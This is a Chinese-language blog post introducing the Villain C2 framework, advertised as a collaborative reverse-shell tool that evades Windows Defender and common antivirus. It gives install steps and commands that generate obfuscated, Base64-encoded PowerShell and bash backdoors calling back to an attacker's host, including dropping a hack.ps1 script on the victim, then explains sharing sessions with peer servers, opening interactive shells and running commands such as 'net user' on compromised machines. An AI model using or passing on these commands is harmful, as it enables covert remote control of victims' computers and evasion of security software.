Villain C2框架 多人协作反弹shell工具 支持免杀Windows Defender常见杀毒软件

相关阅读

视频讲解

今天我们将继续分享C2框架,本期带来的是Villain框架,实测可以免杀Windows Defender常见的杀毒软件……

图文讲解

效果截图

图片[1]-Villain C2框架 多人协作反弹shell工具 支持免杀Windows Defender常见杀毒软件-FancyPig's blog

安装Villain

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

使用方法

基本思路如下

Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]

每个生成的有效负载只会工作一次。已经使用过的有效负载不能重新用于建立会话。后门旨在作为新的后台进程启动。目前支持的后门类型:

  • 适用于 Windows:Powershell
  • 对于 Linux:bash
参数必需支持的操作系统需要输入值描述
os全部为 [windows/linux] 生成后门的操作系统类型。
lhost不适用您的本地 IP 或接口连接回来。
domain可选不适用如果您提供了受信任的证书和 priv_key 文件以使用 SSL 启动 Villain,您可以提供域而不是 lhost。
obfuscateWindows自动混淆生成的有效负载。这旨在帮助您,而不是总是为您完成工作。
encodeWindowsBase64 对生成的有效负载进行编码。
exec_outfileWindows在受害者上提供一个文件路径来编写和执行命令(而不是使用 IEX)
constraint_modeWindows使生成的负载在 PowerShell 约束语言模式下工作。通过使用此选项,您会牺牲一些 shell 的解码清晰度。

案例

譬如我想生成windows的反弹shell

Villain > generate os=windows lhost=eth0 obfuscate
Villain > generate os=windows lhost=192.168.12.36 exec_outfile="C:\Users\\\$env:USERNAME\.local\hack.ps1" encode

譬如我想生成Linux的反弹shell

Villain > generate os=linux lhost=192.168.12.62

连接同级服务器

使用 connect 提示命令连接并与另一台运行 Villain 的机器共享您的后门会话。

connect <IP> <CORE SERVER PORT>

默认情况下,核心服务器端口是 65001 (您可以 -p 在启动 Villain 时更改它)。

shell命令

使用 shell 提示命令针对会话启动交互式 HoaxShell。

shell <SESSION ID or ALIAS>

按 Ctrl + C 或键入 exit 返回到主要的反派提示。

执行命令

使用提示命令从您的文件系统针对会话 exec 执行 引用的命令脚本。

exec </path/to/local/file> <SESSION ID or ALIAS>
exec 'net user;Get-Date' <SESSION ID or ALIAS>
© 版权声明
THE END
喜欢就支持一下吧
点赞13赞赏 分享
评论 共10条

请登录后发表评论